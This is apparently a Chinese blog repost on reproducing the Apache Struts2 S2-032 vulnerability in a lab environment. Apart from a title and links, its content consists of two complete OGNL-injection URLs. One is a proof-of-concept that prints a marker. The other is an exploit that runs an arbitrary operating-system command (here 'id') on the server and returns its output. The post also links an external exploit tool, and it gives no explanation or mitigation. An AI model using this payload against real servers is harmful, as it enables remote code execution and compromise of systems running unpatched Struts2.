漏洞复现：Struts2 S2-032 漏洞环境 - 走看看

zoukankan html css js c++ java

漏洞复现：Struts2 S2-032 漏洞环境

Struts2 S2-032 漏洞环境

http://vulapps.evalbug.com/s_struts2_s2-032/

POC:

http://127.0.0.1/memoindex.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(%23parameters.content[0]%2b602%2b53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086

EXP:

http://127.0.0.1/memoindex.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=id

工具：http://qqhack8.blog.163.com/blog/static/1141479852014631102759126/

附图：

记得旧文章便是新举子

查看全文

相关阅读:
shiro注解，初始化资源和权限，会话管理
 shiro标签
 20个为前端开发者准备的文档和指南
 Canvas处理头像上传
 Chrome 实用调试技巧
 JS 代码编一个倒时器
 sql server优化
 在线图片压缩网站
 Request.QueryString
C#网络爬虫

原文地址：https://www.cnblogs.com/NBeveryday/p/8137964.html

Copyright © 2011-2022 走看看